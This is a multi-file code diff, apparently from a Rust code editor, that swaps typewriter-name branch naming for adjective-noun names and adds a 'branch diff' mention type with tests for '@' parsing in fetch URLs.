- "gourland",
- "grandjean",
- "granta",
- "granville",
- "graphic",
- "gritzner",
- "groma",
- "guhl",
- "guidonia",
- "gundka",
- "hacabo",
- "haddad",
- "halberg",
- "halda",
- "hall",
- "hammond",
- "hammonia",
- "hanford",
- "hansa",
- "harmony",
- "harris",
- "hartford",
- "hassia",
- "hatch",
- "heady",
- "hebronia",
- "hebros",
- "hega",
- "helios",
- "helma",
- "herald",
- "hercules",
- "hermes",
- "herold",
- "heros",
- "hesperia",
- "hogar",
- "hooven",
- "hopkins",
- "horton",
- "hugin",
- "hungaria",
- "hurtu",
- "iberia",
- "idea",
- "ideal",
- "imperia",
- "impo",
- "industria",
- "industrio",
- "ingersoll",
- "international",
- "invicta",
- "irene",
- "iris",
- "iskra",
- "ivitsa",
- "ivriah",
- "jackson",
- "janalif",
- "janos",
- "jolux",
- "juki",
- "junior",
- "juventa",
- "juwel",
- "kamkap",
- "kamo",
- "kanzler",
- "kappel",
- "karli",
- "karstadt",
- "keaton",
- "kenbar",
- "keystone",
- "kim",
- "klein",
- "kneist",
- "knoch",
- "koh",
- "kolibri",
- "kolumbus",
- "komet",
- "kondor",
- "koniger",
- "konryu",
- "kontor",
- "kosmopolit",
- "krypton",
- "lambert",
- "lasalle",
- "lectra",
- "leframa",
- "lemair",
- "lemco",
- "liberty",
- "libia",
- "liga",
- "lignose",
- "lilliput",
- "lindeteves",
- "linowriter",
- "listvitsa",
- "ludolf",
- "lutece",
- "luxa",
- "lyubava",
- "mafra",
- "magnavox",
- "maher",
- "majestic",
- "majitouch",
- "manhattan",
- "mapuua",
- "marathon",
- "marburger",
- "maritsa",
- "maruzen",
- "maskelyne",
- "masspro",
- "matous",
- "mccall",
- "mccool",
- "mcloughlin",
- "mead",
- "mechno",
- "mehano",
- "meiselbach",
- "melbi",
- "melior",
- "melotyp",
- "mentor",
- "mepas",
- "mercedesia",
- "mercurius",
- "mercury",
- "merkur",
- "merritt",
- "merz",
- "messa",
- "meteco",
- "meteor",
- "micron",
- "mignon",
- "mikro",
- "minerva",
- "mirian",
- "mirina",
- "mitex",
- "molle",
- "monac",
- "monarch",
- "mondiale",
- "monica",
- "monofix",
- "monopol",
- "monpti",
- "monta",
- "montana",
- "montgomery",
- "moon",
- "morgan",
- "morris",
- "morse",
- "moya",
- "moyer",
- "munson",
- "musicwriter",
- "nadex",
- "nakajima",
- "neckermann",
- "neubert",
- "neya",
- "ninety",
- "nisa",
- "noiseless",
- "noor",
- "nora",
- "nord",
- "norden",
- "norica",
- "norma",
- "norman",
- "north",
- "nototyp",
- "nova",
- "novalevi",
- "odell",
- "odhner",
- "odo",
- "odoma",
- "ohio",
- "ohtani",
- "oliva",
- "oliver",
- "olivetti",
- "olympia",
- "omega",
- "optima",
- "orbis",
- "orel",
- "orga",
- "oriette",
- "orion",
- "orn",
- "orplid",
- "pacior",
- "pagina",
- "parisienne",
- "passat",
- "pearl",
- "peerless",
- "perfect",
- "perfecta",
- "perkeo",
- "perkins",
- "perlita",
- "pettypet",
- "phoenix",
- "piccola",
- "picht",
- "pinnock",
- "pionier",
- "plurotyp",
- "plutarch",
- "pneumatic",
- "pocket",
- "polyglott",
- "polygraph",
- "pontiac",
- "portable",
- "portex",
- "pozzi",
- "premier",
- "presto",
- "primavera",
- "progress",
- "protos",
- "pterotype",
- "pullman",
- "pulsatta",
- "quick",
- "racer",
- "radio",
- "rally",
- "rand",
- "readers",
- "reed",
- "referent",
- "reff",
- "regent",
- "regia",
- "regina",
- "rekord",
- "reliable",
- "reliance",
- "remagg",
- "rembrandt",
- "remer",
- "remington",
- "remsho",
- "remstar",
- "remtor",
- "reporters",
- "resko",
- "rex",
- "rexpel",
- "rheinita",
- "rheinmetall",
- "rival",
- "roberts",
- "robotron",
- "rocher",
- "rochester",
- "roebuck",
- "rofa",
- "roland",
- "rooy",
- "rover",
- "roxy",
- "roy",
- "royal",
- "rundstatler",
- "sabaudia",
- "sabb",
- "saleem",
- "salter",
- "sampo",
- "sarafan",
- "saturn",
- "saxonia",
- "schade",
- "schapiro",
- "schreibi",
- "scripta",
- "sears",
- "secor",
- "selectric",
- "selekta",
- "senator",
- "sense",
- "senta",
- "serd",
- "shilling",
- "shimade",
- "shimer",
- "sholes",
- "shuang",
- "siegfried",
- "siemag",
- "silma",
- "silver",
- "simplex",
- "simtype",
- "singer",
- "smith",
- "soemtron",
- "sonja",
- "speedwriter",
- "sphinx",
- "starlet",
- "stearns",
- "steel",
- "stella",
- "steno",
- "sterling",
- "stoewer",
- "stolzenberg",
- "stott",
- "strangfeld",
- "sture",
- "stylotyp",
- "sun",
- "superba",
- "superia",
- "supermetall",
- "surety",
- "swintec",
- "swissa",
- "talbos",
- "talleres",
- "tatrapoint",
- "taurus",
- "taylorix",
- "tell",
- "tempotype",
- "tippco",
- "titania",
- "tops",
- "towa",
- "toyo",
- "tradition",
- "transatlantic",
- "traveller",
- "trebla",
- "triumph",
- "turia",
- "typatune",
- "typen",
- "typorium",
- "ugro",
- "ultima",
- "unda",
- "underwood",
- "unica",
- "unitype",
- "ursula",
- "utax",
- "varityper",
- "vasanta",
- "vendex",
- "venus",
- "victor",
- "victoria",
- "video",
- "viking",
- "vira",
- "virotyp",
- "visigraph",
- "vittoria",
- "volcan",
- "vornado",
- "voss",
- "vultur",
- "waltons",
- "wanamaker",
- "wanderer",
- "ward",
- "warner",
- "waterloo",
- "waverley",
- "wayne",
- "webster",
- "wedgefield",
- "welco",
- "wellington",
- "wellon",
- "weltblick",
- "westphalia",
- "wiedmer",
- "williams",
- "wilson",
- "winkel",
- "winsor",
- "wizard",
- "woodstock",
- "woodwards",
- "yatran",
- "yost",
- "zenit",
- "zentronik",
- "zeta",
- "zeya",
+const ADJECTIVES: &[&str] = &[
+ "able", "agate", "agile", "alpine", "amber", "ample", "aqua", "arctic", "arid", "astral",
+ "autumn", "avid", "azure", "balmy", "birch", "bold", "boreal", "brave", "breezy", "brief",
+ "bright", "brisk", "broad", "bronze", "calm", "cerith", "civil", "clean", "clear", "clever",
+ "cobalt", "cool", "copper", "coral", "cozy", "crisp", "cubic", "cyan", "deft", "dense", "dewy",
+ "direct", "dusky", "dusty", "eager", "early", "earnest", "elder", "elfin", "equal", "even",
+ "exact", "faint", "fair", "fast", "fawn", "ferny", "fiery", "fine", "firm", "fleet", "floral",
+ "focal", "fond", "frank", "fresh", "frosty", "full", "gentle", "gilded", "glacial", "glad",
+ "glossy", "golden", "grand", "green", "gusty", "hale", "happy", "hardy", "hazel", "hearty",
+ "hilly", "humble", "hushed", "icy", "ideal", "inner", "iron", "ivory", "jade", "jovial",
+ "keen", "kind", "lapis", "leafy", "level", "light", "lilac", "limber", "lively", "local",
+ "lofty", "lucid", "lunar", "major", "maple", "mellow", "merry", "mild", "milky", "misty",
+ "modal", "modest", "mossy", "muted", "native", "naval", "neat", "nimble", "noble", "north",
+ "novel", "oaken", "ochre", "olive", "onyx", "opal", "open", "optic", "outer", "owed", "ozone",
+ "pale", "pastel", "pearl", "pecan", "peppy", "pilot", "placid", "plain", "plum", "plush",
+ "poised", "polar", "polished", "poplar", "prime", "proof", "proud", "pure", "quartz", "quick",
+ "quiet", "rapid", "raspy", "ready", "regal", "rooted", "rosy", "round", "royal", "ruby",
+ "ruddy", "russet", "rustic", "sage", "salty", "sandy", "satin", "scenic", "sedge", "serene",
+ "sharp", "sheer", "silky", "silver", "sleek", "smart", "smooth", "snowy", "solar", "solid",
+ "south", "spry", "stark", "steady", "steel", "steep", "still", "stoic", "stony", "stout",
+ "sturdy", "suede", "sunny", "supple", "sure", "swift", "tall", "tawny", "teal", "terse",
+ "thick", "tidal", "tidy", "timber", "topaz", "total", "trim", "tropic", "true", "tulip",
+ "upper", "urban", "valid", "vast", "velvet", "verde", "vivid", "vocal", "warm", "waxen",
+ "west", "whole", "wide", "wild", "wise", "witty", "woven", "young", "zealous", "zephyr",
+ "zesty", "zinc",
];
-/// Picks a typewriter name that isn't already taken by an existing branch.
-///
-/// Each entry in `existing_branches` is expected to be a full branch name
-/// like `"olivetti-a3f9b2c1"`. The prefix before the last `'-'` is treated
-/// as the taken typewriter name. Branches without a `'-'` are ignored.
+const NOUNS: &[&str] = &[
+ "anchor", "anvil", "arbor", "arch", "arrow", "atlas", "badge", "badger", "basin", "bay",
+ "beacon", "beam", "bell", "birch", "blade", "bloom", "bluff", "bolt", "bower", "breeze",
+ "bridge", "brook", "bunting", "cabin", "cairn", "canyon", "cape", "cedar", "chasm", "cliff",
+ "cloud", "clover", "coast", "cobble", "colt", "comet", "condor", "coral", "cove", "crane",
+ "crater", "creek", "crest", "curlew", "cypress", "dale", "dawn", "delta", "den", "dove",
+ "drake", "drift", "drum", "dune", "dusk", "eagle", "echo", "egret", "elk", "elm", "ember",
+ "falcon", "fawn", "fern", "ferry", "field", "finch", "fjord", "flame", "flint", "flower",
+ "forge", "fossil", "fox", "frost", "gale", "garnet", "gate", "gazelle", "geyser", "glade",
+ "glen", "gorge", "granite", "grove", "gull", "harbor", "hare", "haven", "hawk", "hazel",
+ "heath", "hedge", "heron", "hill", "hollow", "horizon", "ibis", "inlet", "isle", "ivy",
+ "jackal", "jasper", "juniper", "kestrel", "kinglet", "knoll", "lagoon", "lake", "lantern",
+ "larch", "lark", "laurel", "lava", "leaf", "ledge", "lily", "linden", "lodge", "loft", "lotus",
+ "lynx", "mantle", "maple", "marble", "marsh", "marten", "meadow", "merlin", "mesa", "mill",
+ "mint", "moon", "moose", "moss", "newt", "north", "nutmeg", "oak", "oasis", "obsidian",
+ "orbit", "orchid", "oriole", "osprey", "otter", "owl", "palm", "panther", "pass", "path",
+ "peak", "pebble", "pelican", "peony", "perch", "pier", "pine", "plover", "plume", "pond",
+ "poppy", "prairie", "prism", "puma", "quail", "quarry", "quartz", "rain", "rampart", "range",
+ "raven", "ravine", "reed", "reef", "ridge", "river", "robin", "rowan", "sage", "salmon",
+ "sequoia", "shore", "shrike", "sigma", "sky", "slate", "slope", "snow", "spark", "sparrow",
+ "spider", "spruce", "stag", "star", "stone", "stork", "storm", "stream", "summit", "swift",
+ "sycamore", "tern", "terrace", "thistle", "thorn", "thrush", "tide", "timber", "torch",
+ "tower", "trail", "trout", "tulip", "tundra", "vale", "valley", "veranda", "viper", "vista",
+ "vole", "walrus", "warbler", "willow", "wolf", "wren", "yew", "zenith",
+];
+
+/// Generates a branch name in `"adjective-noun"` format (e.g. `"swift-falcon"`).
///
-/// Returns `None` when every name in the pool is already taken.
-pub fn pick_typewriter_name(
- existing_branches: &[&str],
- rng: &mut impl Rng,
-) -> Option<&'static str> {
- let disallowed: HashSet<&str> = existing_branches
- .iter()
- .filter_map(|branch| branch.rsplit_once('-').map(|(prefix, _)| prefix))
- .collect();
+/// Tries up to 100 random combinations, skipping any name that already appears
+/// in `existing_branches`. Returns `None` if no unused name is found.
+pub fn generate_branch_name(existing_branches: &[&str], rng: &mut impl Rng) -> Option<String> {
+ let existing: HashSet<&str> = existing_branches.iter().copied().collect();
- let available: Vec<&'static str> = TYPEWRITER_NAMES
- .iter()
- .copied()
- .filter(|name| !disallowed.contains(name))
- .collect();
+ for _ in 0..100 {
+ let adjective = ADJECTIVES[rng.random_range(0..ADJECTIVES.len())];
+ let noun = NOUNS[rng.random_range(0..NOUNS.len())];
+ let name = format!("{adjective}-{noun}");
- if available.is_empty() {
- return None;
+ if !existing.contains(name.as_str()) {
+ return Some(name);
+ }
}
- let index = rng.random_range(0..available.len());
- Some(available[index])
-}
-
-/// Generates a branch name like `"olivetti-a3f9b2c1"` by picking a typewriter
-/// name that isn't already taken and appending an 8-character alphanumeric hash.
-///
-/// Returns `None` when every typewriter name in the pool is already taken.
-pub fn generate_branch_name(existing_branches: &[&str], rng: &mut impl Rng) -> Option<String> {
- let typewriter_name = pick_typewriter_name(existing_branches, rng)?;
- let hash: String = (0..8)
- .map(|_| {
- let idx: u8 = rng.random_range(0..36);
- if idx < 10 {
- (b'0' + idx) as char
- } else {
- (b'a' + idx - 10) as char
- }
- })
- .collect();
- Some(format!("{typewriter_name}-{hash}"))
+ None
}
#[cfg(test)]
@@ -713,134 +80,91 @@ mod tests {
use rand::rngs::StdRng;
#[gpui::test(iterations = 10)]
- fn test_pick_typewriter_name_with_no_disallowed(mut rng: StdRng) {
- let name = pick_typewriter_name(&[], &mut rng);
- assert!(name.is_some());
- assert!(TYPEWRITER_NAMES.contains(&name.unwrap()));
- }
-
- #[gpui::test(iterations = 10)]
- fn test_pick_typewriter_name_excludes_taken_names(mut rng: StdRng) {
- let branch_names = &["olivetti-abc12345", "selectric-def67890"];
- let name = pick_typewriter_name(branch_names, &mut rng).unwrap();
- assert_ne!(name, "olivetti");
- assert_ne!(name, "selectric");
- }
-
- #[gpui::test]
- fn test_pick_typewriter_name_all_taken(mut rng: StdRng) {
- let branch_names: Vec<String> = TYPEWRITER_NAMES
- .iter()
- .map(|name| format!("{name}-00000000"))
- .collect();
- let branch_name_refs: Vec<&str> = branch_names.iter().map(|s| s.as_str()).collect();
- let name = pick_typewriter_name(&branch_name_refs, &mut rng);
- assert!(name.is_none());
- }
-
- #[gpui::test(iterations = 10)]
- fn test_pick_typewriter_name_ignores_branches_without_hyphen(mut rng: StdRng) {
- let branch_names = &["main", "develop", "feature"];
- let name = pick_typewriter_name(branch_names, &mut rng);
- assert!(name.is_some());
- assert!(TYPEWRITER_NAMES.contains(&name.unwrap()));
+ fn test_generate_branch_name_format(mut rng: StdRng) {
+ let name = generate_branch_name(&[], &mut rng).unwrap();
+ let (adjective, noun) = name.split_once('-').expect("name should contain a hyphen");
+ assert!(
+ ADJECTIVES.contains(&adjective),
+ "{adjective:?} is not in ADJECTIVES"
+ );
+ assert!(NOUNS.contains(&noun), "{noun:?} is not in NOUNS");
}
- #[gpui::test(iterations = 10)]
- fn test_generate_branch_name_format(mut rng: StdRng) {
- let branch_name = generate_branch_name(&[], &mut rng).unwrap();
- let (prefix, suffix) = branch_name.rsplit_once('-').unwrap();
- assert!(TYPEWRITER_NAMES.contains(&prefix));
- assert_eq!(suffix.len(), 8);
- assert!(suffix.chars().all(|c| c.is_ascii_alphanumeric()));
+ #[gpui::test(iterations = 100)]
+ fn test_generate_branch_name_avoids_existing(mut rng: StdRng) {
+ let existing = &["swift-falcon", "calm-river", "bold-cedar"];
+ let name = generate_branch_name(existing, &mut rng).unwrap();
+ for &branch in existing {
+ assert_ne!(
+ name, branch,
+ "generated name should not match an existing branch"
+ );
+ }
}
#[gpui::test]
- fn test_generate_branch_name_returns_none_when_exhausted(mut rng: StdRng) {
- let branch_names: Vec<String> = TYPEWRITER_NAMES
+ fn test_generate_branch_name_returns_none_when_stuck(mut rng: StdRng) {
+ let all_names: Vec<String> = ADJECTIVES
.iter()
- .map(|name| format!("{name}-00000000"))
+ .flat_map(|adj| NOUNS.iter().map(move |noun| format!("{adj}-{noun}")))
.collect();
- let branch_name_refs: Vec<&str> = branch_names.iter().map(|s| s.as_str()).collect();
- let result = generate_branch_name(&branch_name_refs, &mut rng);
+ let refs: Vec<&str> = all_names.iter().map(|s| s.as_str()).collect();
+ let result = generate_branch_name(&refs, &mut rng);
assert!(result.is_none());
}
- #[gpui::test(iterations = 100)]
- fn test_generate_branch_name_never_reuses_taken_prefix(mut rng: StdRng) {
- let existing = &["olivetti-123abc", "selectric-def456"];
- let branch_name = generate_branch_name(existing, &mut rng).unwrap();
- let (prefix, _) = branch_name.rsplit_once('-').unwrap();
- assert_ne!(prefix, "olivetti");
- assert_ne!(prefix, "selectric");
- }
+ #[test]
+ fn test_adjectives_are_valid() {
+ let mut seen = HashSet::default();
+ for &word in ADJECTIVES {
+ assert!(seen.insert(word), "duplicate entry in ADJECTIVES: {word:?}");
+ }
- #[gpui::test(iterations = 100)]
- fn test_generate_branch_name_avoids_multiple_taken_prefixes(mut rng: StdRng) {
- let existing = &[
- "olivetti-aaa11111",
- "selectric-bbb22222",
- "corona-ccc33333",
- "remington-ddd44444",
- "underwood-eee55555",
- ];
- let taken_prefixes: HashSet<&str> = existing
- .iter()
- .filter_map(|b| b.rsplit_once('-').map(|(prefix, _)| prefix))
- .collect();
- let branch_name = generate_branch_name(existing, &mut rng).unwrap();
- let (prefix, _) = branch_name.rsplit_once('-').unwrap();
- assert!(
- !taken_prefixes.contains(prefix),
- "generated prefix {prefix:?} collides with an existing branch"
- );
- }
+ for window in ADJECTIVES.windows(2) {
+ assert!(
+ window[0] < window[1],
+ "ADJECTIVES is not sorted: {0:?} should come before {1:?}",
+ window[0],
+ window[1],
+ );
+ }
- #[gpui::test(iterations = 100)]
- fn test_generate_branch_name_with_varied_hash_suffixes(mut rng: StdRng) {
- let existing = &[
- "olivetti-aaaaaaaa",
- "olivetti-bbbbbbbb",
- "olivetti-cccccccc",
- ];
- let branch_name = generate_branch_name(existing, &mut rng).unwrap();
- let (prefix, _) = branch_name.rsplit_once('-').unwrap();
- assert_ne!(
- prefix, "olivetti",
- "should avoid olivetti regardless of how many variants exist"
- );
+ for &word in ADJECTIVES {
+ assert!(
+ !word.contains('-'),
+ "ADJECTIVES entry contains a hyphen: {word:?}"
+ );
+ assert!(
+ word.chars().all(|c| c.is_lowercase()),
+ "ADJECTIVES entry is not all lowercase: {word:?}"
+ );
+ }
}
#[test]
- fn test_typewriter_names_are_valid() {
+ fn test_nouns_are_valid() {
let mut seen = HashSet::default();
- for &name in TYPEWRITER_NAMES {
- assert!(
- seen.insert(name),
- "duplicate entry in TYPEWRITER_NAMES: {name:?}"
- );
+ for &word in NOUNS {
+ assert!(seen.insert(word), "duplicate entry in NOUNS: {word:?}");
}
- for window in TYPEWRITER_NAMES.windows(2) {
+ for window in NOUNS.windows(2) {
assert!(
- window[0] <= window[1],
- "TYPEWRITER_NAMES is not sorted: {0:?} should come after {1:?}",
- window[1],
+ window[0] < window[1],
+ "NOUNS is not sorted: {0:?} should come before {1:?}",
window[0],
+ window[1],
);
}
- for &name in TYPEWRITER_NAMES {
+ for &word in NOUNS {
assert!(
- !name.contains('-'),
- "TYPEWRITER_NAMES entry contains a hyphen: {name:?}"
+ !word.contains('-'),
+ "NOUNS entry contains a hyphen: {word:?}"
);
- }
-
- for &name in TYPEWRITER_NAMES {
assert!(
- name.chars().all(|c| c.is_lowercase() || !c.is_alphabetic()),
- "TYPEWRITER_NAMES entry is not lowercase: {name:?}"
+ word.chars().all(|c| c.is_lowercase()),
+ "NOUNS entry is not all lowercase: {word:?}"
);
}
}
@@ -4,6 +4,7 @@ use std::path::PathBuf;
use std::sync::Arc;
use std::sync::atomic::AtomicBool;
+use crate::DEFAULT_THREAD_TITLE;
use crate::ThreadHistory;
use acp_thread::MentionUri;
use agent_client_protocol as acp;
@@ -64,6 +65,7 @@ pub(crate) enum PromptContextType {
Thread,
Rules,
Diagnostics,
+ BranchDiff,
}
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
@@ -102,6 +104,7 @@ impl TryFrom<&str> for PromptContextType {
"thread" => Ok(Self::Thread),
"rule" => Ok(Self::Rules),
"diagnostics" => Ok(Self::Diagnostics),
+ "diff" => Ok(Self::BranchDiff),
_ => Err(format!("Invalid context picker mode: {}", value)),
}
}
@@ -116,6 +119,7 @@ impl PromptContextType {
Self::Thread => "thread",
Self::Rules => "rule",
Self::Diagnostics => "diagnostics",
+ Self::BranchDiff => "branch diff",
}
}
@@ -127,6 +131,7 @@ impl PromptContextType {
Self::Thread => "Threads",
Self::Rules => "Rules",
Self::Diagnostics => "Diagnostics",
+ Self::BranchDiff => "Branch Diff",
}
}
@@ -138,6 +143,7 @@ impl PromptContextType {
Self::Thread => IconName::Thread,
Self::Rules => IconName::Reader,
Self::Diagnostics => IconName::Warning,
+ Self::BranchDiff => IconName::GitBranch,
}
}
}
@@ -150,6 +156,12 @@ pub(crate) enum Match {
Fetch(SharedString),
Rules(RulesContextEntry),
Entry(EntryMatch),
+ BranchDiff(BranchDiffMatch),
+}
+
+#[derive(Debug, Clone)]
+pub struct BranchDiffMatch {
+ pub base_ref: SharedString,
}
impl Match {
@@ -162,6 +174,7 @@ impl Match {
Match::Symbol(_) => 1.,
Match::Rules(_) => 1.,
Match::Fetch(_) => 1.,
+ Match::BranchDiff(_) => 1.,
}
}
}
@@ -180,7 +193,7 @@ pub struct EntryMatch {
fn session_title(title: Option<SharedString>) -> SharedString {
title
.filter(|title| !title.is_empty())
- .unwrap_or_else(|| SharedString::new_static("New Thread"))
+ .unwrap_or_else(|| SharedString::new_static(DEFAULT_THREAD_TITLE))
}
#[derive(Debug, Clone)]
@@ -211,7 +224,7 @@ pub struct PromptCompletionProvider<T: PromptCompletionProviderDelegate> {
source: Arc<T>,
editor: WeakEntity<Editor>,
mention_set: Entity<MentionSet>,
- history: WeakEntity<ThreadHistory>,
+ history: Option<WeakEntity<ThreadHistory>>,
prompt_store: Option<Entity<PromptStore>>,
workspace: WeakEntity<Workspace>,
}
@@ -221,7 +234,7 @@ impl<T: PromptCompletionProviderDelegate> PromptCompletionProvider<T> {
source: T,
editor: WeakEntity<Editor>,
mention_set: Entity<MentionSet>,
- history: WeakEntity<ThreadHistory>,
+ history: Option<WeakEntity<ThreadHistory>>,
prompt_store: Option<Entity<PromptStore>>,
workspace: WeakEntity<Workspace>,
) -> Self {
@@ -781,6 +794,47 @@ impl<T: PromptCompletionProviderDelegate> PromptCompletionProvider<T> {
}
}
+ fn build_branch_diff_completion(
+ base_ref: SharedString,
+ source_range: Range<Anchor>,
+ source: Arc<T>,
+ editor: WeakEntity<Editor>,
+ mention_set: WeakEntity<MentionSet>,
+ workspace: Entity<Workspace>,
+ cx: &mut App,
+ ) -> Completion {
+ let uri = MentionUri::GitDiff {
+ base_ref: base_ref.to_string(),
+ };
+ let crease_text: SharedString = format!("Branch Diff (vs {})", base_ref).into();
+ let display_text = format!("@{}", crease_text);
+ let new_text = format!("[{}]({}) ", display_text, uri.to_uri());
+ let new_text_len = new_text.len();
+ let icon_path = uri.icon_path(cx);
+
+ Completion {
+ replace_range: source_range.clone(),
+ new_text,
+ label: CodeLabel::plain(crease_text.to_string(), None),
+ documentation: None,
+ source: project::CompletionSource::Custom,
+ icon_path: Some(icon_path),
+ match_start: None,
+ snippet_deduplication_key: None,
+ insert_text_mode: None,
+ confirm: Some(confirm_completion_callback(
+ crease_text,
+ source_range.start,
+ new_text_len - 1,
+ uri,
+ source,
+ editor,
+ mention_set,
+ workspace,
+ )),
+ }
+ }
+
fn search_slash_commands(&self, query: String, cx: &mut App) -> Task<Vec<AvailableCommand>> {
let commands = self.source.available_commands(cx);
if commands.is_empty() {
@@ -812,6 +866,27 @@ impl<T: PromptCompletionProviderDelegate> PromptCompletionProvider<T> {
})
}
+ fn fetch_branch_diff_match(
+ &self,
+ workspace: &Entity<Workspace>,
+ cx: &mut App,
+ ) -> Option<Task<Option<BranchDiffMatch>>> {
+ let project = workspace.read(cx).project().clone();
+ let repo = project.read(cx).active_repository(cx)?;
+
+ let default_branch_receiver = repo.update(cx, |repo, _| repo.default_branch(true));
+
+ Some(cx.spawn(async move |_cx| {
+ let base_ref = default_branch_receiver
+ .await
+ .ok()
+ .and_then(|r| r.ok())
+ .flatten()?;
+
+ Some(BranchDiffMatch { base_ref })
+ }))
+ }
+
fn search_mentions(
&self,
mode: Option<PromptContextType>,
@@ -846,7 +921,7 @@ impl<T: PromptCompletionProviderDelegate> PromptCompletionProvider<T> {
}
Some(PromptContextType::Thread) => {
- if let Some(history) = self.history.upgrade() {
+ if let Some(history) = self.history.as_ref().and_then(|h| h.upgrade()) {
let sessions = history
.read(cx)
.sessions()
@@ -892,6 +967,8 @@ impl<T: PromptCompletionProviderDelegate> PromptCompletionProvider<T> {
Some(PromptContextType::Diagnostics) => Task::ready(Vec::new()),
+ Some(PromptContextType::BranchDiff) => Task::ready(Vec::new()),
+
None if query.is_empty() => {
let recent_task = self.recent_context_picker_entries(&workspace, cx);
let entries = self
@@ -905,9 +982,25 @@ impl<T: PromptCompletionProviderDelegate> PromptCompletionProvider<T> {
})
.collect::<Vec<_>>();
+ let branch_diff_task = if self
+ .source
+ .supports_context(PromptContextType::BranchDiff, cx)
+ {
+ self.fetch_branch_diff_match(&workspace, cx)
+ } else {
+ None
+ };
+
cx.spawn(async move |_cx| {
let mut matches = recent_task.await;
matches.extend(entries);
+
+ if let Some(branch_diff_task) = branch_diff_task {
+ if let Some(branch_diff_match) = branch_diff_task.await {
+ matches.push(Match::BranchDiff(branch_diff_match));
+ }
+ }
+
matches
})
}
@@ -924,7 +1017,16 @@ impl<T: PromptCompletionProviderDelegate> PromptCompletionProvider<T> {
.map(|(ix, entry)| StringMatchCandidate::new(ix, entry.keyword()))
.collect::<Vec<_>>();
- cx.background_spawn(async move {
+ let branch_diff_task = if self
+ .source
+ .supports_context(PromptContextType::BranchDiff, cx)
+ {
+ self.fetch_branch_diff_match(&workspace, cx)
+ } else {
+ None
+ };
+
+ cx.spawn(async move |cx| {
let mut matches = search_files_task
.await
.into_iter()
@@ -949,6 +1051,26 @@ impl<T: PromptCompletionProviderDelegate> PromptCompletionProvider<T> {
})
}));
+ if let Some(branch_diff_task) = branch_diff_task {
+ let branch_diff_keyword = PromptContextType::BranchDiff.keyword();
+ let branch_diff_matches = fuzzy::match_strings(
+ &[StringMatchCandidate::new(0, branch_diff_keyword)],
+ &query,
+ false,
+ true,
+ 1,
+ &Arc::new(AtomicBool::default()),
+ cx.background_executor().clone(),
+ )
+ .await;
+
+ if !branch_diff_matches.is_empty() {
+ if let Some(branch_diff_match) = branch_diff_task.await {
+ matches.push(Match::BranchDiff(branch_diff_match));
+ }
+ }
+ }
+
matches.sort_by(|a, b| {
b.score()
.partial_cmp(&a.score())
@@ -977,11 +1099,11 @@ impl<T: PromptCompletionProviderDelegate> PromptCompletionProvider<T> {
if let Some(agent_panel) = workspace.panel::<AgentPanel>(cx)
&& let Some(thread) = agent_panel.read(cx).active_agent_thread(cx)
+ && let Some(title) = thread.read(cx).title()
{
- let thread = thread.read(cx);
mentions.insert(MentionUri::Thread {
- id: thread.session_id().clone(),
- name: thread.title().into(),
+ id: thread.read(cx).session_id().clone(),
+ name: title.to_string(),
});
}
@@ -1025,7 +1147,7 @@ impl<T: PromptCompletionProviderDelegate> PromptCompletionProvider<T> {
return Task::ready(recent);
}
- if let Some(history) = self.history.upgrade() {
+ if let Some(history) = self.history.as_ref().and_then(|h| h.upgrade()) {
const RECENT_COUNT: usize = 2;
recent.extend(
history
@@ -1364,6 +1486,17 @@ impl<T: PromptCompletionProviderDelegate> CompletionProvider for PromptCompletio
cx,
)
}
+ Match::BranchDiff(branch_diff) => {
+ Some(Self::build_branch_diff_completion(
+ branch_diff.base_ref,
+ source_range.clone(),
+ source.clone(),
+ editor.clone(),
+ mention_set.clone(),
+ workspace.clone(),
+ cx,
+ ))
+ }
})
.collect::<Vec<_>>()
});
@@ -1559,27 +1692,34 @@ impl MentionCompletion {
offset_to_line: usize,
supported_modes: &[PromptContextType],
) -> Option<Self> {
- let last_mention_start = line.rfind('@')?;
+ // Find the rightmost '@' that has a word boundary before it and no whitespace immediately after
+ let mut last_mention_start = None;
+ for (idx, _) in line.rmatch_indices('@') {
+ // No whitespace immediately after '@'
+ if line[idx + 1..]
+ .chars()
+ .next()
+ .is_some_and(|c| c.is_whitespace())
+ {
+ continue;
+ }
- // No whitespace immediately after '@'
- if line[last_mention_start + 1..]
- .chars()
- .next()
- .is_some_and(|c| c.is_whitespace())
- {
- return None;
- }
+ // Must be a word boundary before '@'
+ if idx > 0
+ && line[..idx]
+ .chars()
+ .last()
+ .is_some_and(|c| !c.is_whitespace())
+ {
+ continue;
+ }
- // Must be a word boundary before '@'
- if last_mention_start > 0
- && line[..last_mention_start]
- .chars()
- .last()
- .is_some_and(|c| !c.is_whitespace())
- {
- return None;
+ last_mention_start = Some(idx);
+ break;
}
+ let last_mention_start = last_mention_start?;
+
let rest_of_line = &line[last_mention_start + 1..];
let mut mode = None;
@@ -2356,6 +2496,48 @@ mod tests {
None,
"Should not parse with a space after @ at the start of the line"
);
+
+ assert_eq!(
+ MentionCompletion::try_parse(
+ "@fetch https://www.npmjs.com/package/@matterport/sdk",
+ 0,
+ &[PromptContextType::Fetch]
+ ),
+ Some(MentionCompletion {
+ source_range: 0..52,
+ mode: Some(PromptContextType::Fetch),
+ argument: Some("https://www.npmjs.com/package/@matterport/sdk".to_string()),
+ }),
+ "Should handle URLs with @ in the path"
+ );
+
+ assert_eq!(
+ MentionCompletion::try_parse(
+ "@fetch https://example.com/@org/@repo/file",
+ 0,
+ &[PromptContextType::Fetch]
+ ),
+ Some(MentionCompletion {
+ source_range: 0..42,
+ mode: Some(PromptContextType::Fetch),
+ argument: Some("https://example.com/@org/@repo/file".to_string()),
+ }),
+ "Should handle URLs with multiple @ characters"
+ );
+
+ assert_eq!(
+ MentionCompletion::try_parse(
+ "@fetch https://example.com/@",
+ 0,
+ &[PromptContextType::Fetch]
+ ),
+ Some(MentionCompletion {
+ source_range: 0..28,
+ mode: Some(PromptContextType::Fetch),
+ argument: Some("https://example.com/@".to_string()),
+ }),
+ "Should parse URL ending with @ (even if URL is incomplete)"
+ );
}
#[gpui::test]
@@ -350,10 +350,7 @@ impl ConfigOptionSelector {
)
.label_size(LabelSize::Small)
.color(Color::Muted)
- .icon(icon)
- .icon_size(IconSize::XSmall)
- .icon_position(IconPosition::End)
- .icon_color(Color::Muted)
+ .end_icon(Icon::new(icon).size(IconSize::XSmall).color(Color::Muted))
.disabled(self.setting_value)
}
}
@@ -1,17 +1,18 @@
use acp_thread::{
AcpThread, AcpThreadEvent, AgentSessionInfo, AgentThreadEntry, AssistantMessage,
AssistantMessageChunk, AuthRequired, LoadError, MentionUri, PermissionOptionChoice,
